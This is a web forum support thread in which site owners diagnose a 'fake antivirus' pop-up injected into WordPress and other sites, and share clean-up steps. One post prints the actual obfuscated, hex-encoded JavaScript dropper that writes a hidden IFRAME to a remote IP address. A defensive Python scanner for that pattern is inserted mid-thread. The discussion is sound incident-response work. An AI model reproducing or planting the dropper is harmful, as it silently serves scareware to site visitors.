
advanced xp defender (31 posts)

  1. gmatkin
    Member
    Posted 6 years ago #

    My weblog http://intheboatshed.net seems to have been infected with some sort of Trojan, and I'd be most grateful for advice urgently.

    The thing pops up when I hit the admin and view site links, and I guess it's probably infecting readers' computers as I write.

    What happens is that a message appears that reads:

    Attention! You have not completed the virus scan!
    Your PC is still infected with spyware!

    Please return to advancedxpdefender.com and download Advanced XP Defender scanner.

    When I click that off using the top-right-hand cross it seems to have another go.

    Now, I know this is not happening on my main computer only, as I've tested it on my second computer. I also know that my spyware detector is picking it up as a Trojan, that appears to come from my weblog.

    Has it been hacked, and if so what should I do please?

    Thanks,

    Gavin

  2. gmatkin
    Member
    Posted 6 years ago #

    I've changed my password, replaced the theme, and scanned my computer.

    I really don't know what else to do - would reinstalling WordPress help, do you think?

    Gav

  3. iridiax
    Member
    Posted 6 years ago #

    If it happens on websites other than your own, then your computer may be the one infected. If it is only your website, then the bad stuff may be hiding inside your WordPress files (theme and/or core), in your WordPress folders, in your database, or hiding somewhere else on your website.

  4. mikey1
    Member
    Posted 6 years ago #

    Hi there, I think you may want to take a look at this.
    http://www.2-spyware.com/remove-advanced-xp-defender.html

    Basically it's a scam!!
    Hope it helps. Mike.

  5. gmatkin
    Member
    Posted 6 years ago #

    Thanks everyone.

    It was in the weblog and I fixed the immediate problem by reinstalling Wp 2.51, and changed my password for something more difficult.

    My question remains: how did it get in there? Did I install an infected plugin? Did I get hacked? If it happens to anyone else, at least we'll know what to do.

    Gav

  6. iridiax
    Member
    Posted 6 years ago #

    I myself would like to know how people with 2.5.1 are getting hacked.

  7. mikey1
    Member
    Posted 6 years ago #

    I don't personally think that Advanced XP Defender is about hacking.
    Simply because it's a known spyware and not a virus.
    Spyware has to be in something we download and can't be injected into our systems by hacking.
    I'm glad that Gav appears to have resolved the problem.
    Night all. Mike.

  8. TWRO
    Member
    Posted 6 years ago #

    I've got this same problem. I've re-installed wordpress and scanned my PC with Spyware Doctor yet the problem continues. Could anyone help me please?

  9. mikey1
    Member
    Posted 6 years ago #

  10. TWRO
    Member
    Posted 6 years ago #

    I did everything last night and it appeared to have worked. Yet today when I clicked around it popped back up again. I have no clue what to do now.

    I mean it's only on my site I get this pop-up.

  11. mikey1
    Member
    Posted 6 years ago #

    You could try an excellent anti-spyware program like
    SuperAntiSpyware, which is free and very powerful.
    It's available at the above link.
    It usually finds everything.
    If it's appearing on only your website, try clearing cookies and your cache. If I hear any more about this one I will post back.
    Mike.

  12. mikey1
    Member
    Posted 6 years ago #

    The following info is important in getting rid of this spyware.
    http://removal-tool.com/advanced-xp-defender/

    Hope we can get rid of it once and for all.
    Mike.

  13. TWRO
    Member
    Posted 6 years ago #

    It helped but when I went on my site today it is back again! I just don't know anymore.

    Here is the site: http://thewrestlingreviewonline.com/

  14. mikey1
    Member
    Posted 6 years ago #

    Hi again, well it sounds as though it's lurking somewhere.
    I would use the removal tools again, and also make sure you scan all drives, not just c:/
    Also, out of interest, what browser are you using?
    If you have a different browser on your computer, see if it appears with that also. There are known loopholes in current browsers that can let this kind of virulent spyware through.
    I'm sorry that it is still appearing, but really, I can only advise you to keep cleaning and perhaps try better spyware software.
    SuperAntiSpyware is free and will clear out most things.
    http://www.superantispyware.com/
    I did this yesterday and found 159, so it really is important
    to regularly scan for these things.
    Keep us posted on what happens. I'm still researching this particular
    type and will post if I find a better fix.
    Mike.

  15. skaterkee
    Member
    Posted 6 years ago #

    This just happened to me, and to the guys posting all the removal tools - it's not a case of it being on our PC systems. It is somehow in the WordPress installation and popping up only to visitors on the site.

    My guess is we've downloaded a plugin that has this little beastie inside it somehow and we've installed it on our blogs. Whether this was deliberate or not I don't know.

    Something even more strange is my blog is also a wrestling blog, but I'll put that down to coincidence.

    All I can say is list all the plugins, themes and mods you have installed and see if any crossover. Firstly I'm gonna go through everything and see if I can find it.

    I must say this is extremely worrying, I've only been using wordpress for 3 weeks after being told it was the easiest and most secure - obviously not.

  16. skaterkee
    Member
    Posted 6 years ago #

    Holy crap - upon making a backup it has somehow locked all the files from being edited - I'm actually scared now. My site is my main income.

  17. skaterkee
    Member
    Posted 6 years ago #

    Well I just replaced the index.php with a backup and it went away but I don't think it'll be gone for long because I have no idea how it got there.

  18. denissi
    Member
    Posted 6 years ago #

    The problem is not with your WP version or anything... it just happened on a few of our Drupal-based sites and also a custom-coded ASP site - we are guessing it has something to do with our FTP info being shared. We're trying multiple things and will keep you guys posted as well. Please hit us up if any of you find the issue. - Thanks a lot [Danish]

  19. kalapacengkir
    Member
    Posted 6 years ago #

    Guys, thanks for discussing this problem online. I have the same problem. It has come to my attention that it only popped up when I was currently browsing my site or when I was about to leave.

    Just to make sure, I've used AntiVir, Malwarebytes' Anti-Malware and Spybot to check, but they found nothing.

    So, here's the idea to trace it: how about we compare the version of WordPress and the active plugins we used?

    Here's mine:
    Wordpress 2.5.1
    Calendar 2.0
    cforms 8.5.1
    Exec-PHP 4.7
    GetWeather 1.2.1
    Image Counter 1.0
    My Link Order 2.5.1
    NextGEN Gallery 0.96
    Pagebar2 2.20
    pageMash 1.1.3
    Ryans Suckerfish WordPress Dropdown Menu 1.6.6
    Search Hilite 1.5
    Simple Archive Generator 3.2
    Simple Cache 1.0
    TinyMCE Advanced 3.0.1
    Truncate Title 1.0
    WP-Highslide 1.28
    WP-Print 2.30
    WP-UserOnline 2.30

    regards,
    kalapacengkir

  20. kalapacengkir
    Member
    Posted 6 years ago #

    A little update, guys..

    I found that it changed 4 files (on the online server),
    \public_html\index.php
    \public_html\wp-admin\index.php
    \public_html\wp-content\index.html
    \public_html\wp-includes\index.html
    by inserting some scripts.

    This is my changed index.php:

    <?php
    /* Short and sweet */
    define('WP_USE_THEMES', true);
    require('./wp-blog-header.php');
    ?><script>
    <!--
    var d=document,kol=561;
    function O10H485A55AFF19D2(H485A55AFF21B6){ var H485A55AFF25B0 = 16; return( parseInt(H485A55AFF21B6,H485A55AFF25B0));}function H485A55AFF2DA8(H485A55AFF31A5){ var H485A55AFF359E='';for(H485A55AFF3999=0; H485A55AFF3999<H485A55AFF31A5.length; H485A55AFF3999+=2){ H485A55AFF359E += ( String.fromCharCode (O10H485A55AFF19D2(H485A55AFF31A5.substr(H485A55AFF3999, 2))));}return H485A55AFF359E;} document.write(H485A55AFF2DA8('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3337393532292B2766333434395C272077696474683D353933206865696768743D3634207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
    //-->
    </script>

    regards,
    kalapacengkir

  21. TWRO
    Member
    Posted 6 years ago #

    It's not just exclusive to WordPress. I uploaded HTML files and it still appeared on them. I think it just ruins your whole server and adds that script to your files.

  22. rofenstein
    Member
    Posted 6 years ago #

    I've been struggling with this one too, but might(!) have solved it.

    Couple of days ago this popped up on my custom coded php website. I'm running on a windows server and integrated into my site are 2 copies of wordpress and 1 copy of phpBB. The only WordPress plugin running was akismet.

    It seems to mainly infect files (see code in post above) with the prefix index, regardless of the extension. However, it did appear in login.php of phpBB.

    Initially I thought this was an injection attack. So I removed all the hacked code from the infected files and upgraded to latest version of wordpress and phpBB.

    We also have a custom form that uses a formmail script. I tightened up the validation on all the fields, and restricted the entry for fields to no more than 35 characters.

    I thought this has solved it, until the next morning when it reappeared!

    I then upgraded the formmail script, deleted any old files via FTP, changed ftp passwords and removed any other FTP users.

    I also ran a spyware scanner on our server... Which is the key bit...
    It picked up 2 trojans one of them being 'advanced xp defender'.

    So far (fingers crossed) we haven't been re-infected.

    I suggest that if you are having this problem that you:

    • Remove all malicious code from infected files
    • Upgrade to the latest version of wordpress/ other open source apps
    • Change FTP passwords
    • Upgrade plugins
    • Disable plugins that use forms on the front end
    • Delete any old files on your server
    • Ensure any custom forms use validation and the latest scripts
    • Get your host to perform a virus/spyware scan on their server

    The spyware app I used was Spyware doctor from PCtools.

    Hope this helps.

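Post 20 shows the dropper appended after the closing ?> (a hex-pair decoder fed to document.write), and post 22 recommends removing it from every infected file. The following is an added example, not code from this thread: a Python scanner that walks a web root, flags files carrying that document.write(decoder('<hex>')) pattern, decodes the hex pairs the same way the dropper does, and lists the hidden IFRAME target so it can be blocked at the firewall or proxy. The file layout, the dec function name and the dropper.invalid host are constructed placeholders.

```python
import os
import re
import tempfile
# Dropper signature from post 20: document.write(<decoder>('<long hex string>'))
INJECT_RE = re.compile(r"document\.write\(\s*\w+\(\s*'([0-9A-Fa-f]{20,})'\s*\)\s*\)")
# IFRAME targets inside the decoded HTML (quotes are backslash-escaped inside d.write)
SRC_RE = re.compile(r"src=\\?'([^'\\]+)")

def decode_hex_pairs(blob):
    """Reverse the dropper's decoder: every two hex digits are one character code."""
    return "".join(chr(int(blob[i:i + 2], 16)) for i in range(0, len(blob), 2))

def find_injection(source):
    """Return (hex_blob, decoded_html) when the file carries the dropper, else None."""
    m = INJECT_RE.search(source)
    return (m.group(1), decode_hex_pairs(m.group(1))) if m else None

def iframe_sources(decoded_html):
    """List the URLs the decoded payload loads in its hidden IFRAME (the IoC to block)."""
    return SRC_RE.findall(decoded_html)

def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk a web root; report every infected file with its decoded iframe targets."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = find_injection(fh.read())
            if found:
                hits.append((os.path.relpath(path, root), iframe_sources(found[1])))
    return sorted(hits)

# Constructed sample: a placeholder payload hex-encoded the way the thread's dropper does it.
SAMPLE_PAYLOAD = ("<script>d.write('<IFRAME src=\\'http://dropper.invalid/go.html\\' "
                  "style=\\'display: none\\'></IFRAME>');</script>")
SAMPLE_INDEX_PHP = ("<?php\ndefine('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n"
                    "?><script>\n<!--\nvar d=document,kol=561;\ndocument.write(dec('"
                    + SAMPLE_PAYLOAD.encode("ascii").hex() + "'));\n//-->\n</script>\n")
def scan_sample_tree():
    """Build a throwaway web root with two infected files and one clean file, then scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-admin"))
        files = {"index.php": SAMPLE_INDEX_PHP, "wp-admin/index.php": SAMPLE_INDEX_PHP,
                 "about.html": "<html><body>clean page</body></html>\n"}
        for rel, body in files.items():
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)  # -> [("index.php", [...]), ("wp-admin/index.php", [...])]
```

Point scan_tree at the real document root to get the list of files to clean; the decoded IFRAME host is the address to block and to search for in access logs.
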
  23. kalapacengkir
    Member
    Posted 6 years ago #

    @rofenstein
    Thanks a lot, it's crystal clear.

    It's been 2 days since I tried to fix mine, no pop-up anymore.

    Actually I'd removed that script once before, but the pop-up kept showing. Then I remembered that I'd used a cracked FTP client! Having that in mind, I threw out the old one, switched to FileZilla, removed that script and then changed my FTP password.

    As I found out (via googling) that even a hand-made and also a 2-years-safe site had been infected, I guess what we've uploaded (CMS) is not suspected anymore. Now only 2 are left: the uploading process, and the server itself.

    I guess we'll find out shortly what the real problem is. For now, I recommend you to
    - try to change FTP client
    - remove the script from infected files, and then
    - change FTP password

    Can't wait to hear news from you guys..

    Hope this helps, too.

  24. skaterkee
    Member
    Posted 6 years ago #

    Thanks for the help I'm in the process of fixing it now but my site has been labeled as dangerous by google :(

  25. skaterkee
    Member
    Posted 6 years ago #

    May I ask how you scanned your server for spyware?

  26. rofenstein
    Member
    Posted 6 years ago #

    Skaterkee, we have our own dedicated server, which means access like a normal computer. If you're on shared hosting, contact your host to perform a scan.

  27. skaterkee
    Member
    Posted 6 years ago #

    That'll take two weeks knowing hostgator.

    Do you know if there's a way to check wordpress's database for abnormalities?

  28. skaterkee
    Member
    Posted 6 years ago #

    God sakes, my host went off on one and deleted everything off my account.

  29. falguni1
    Member
    Posted 6 years ago #

  30. falguni1
    Member
    Posted 6 years ago #
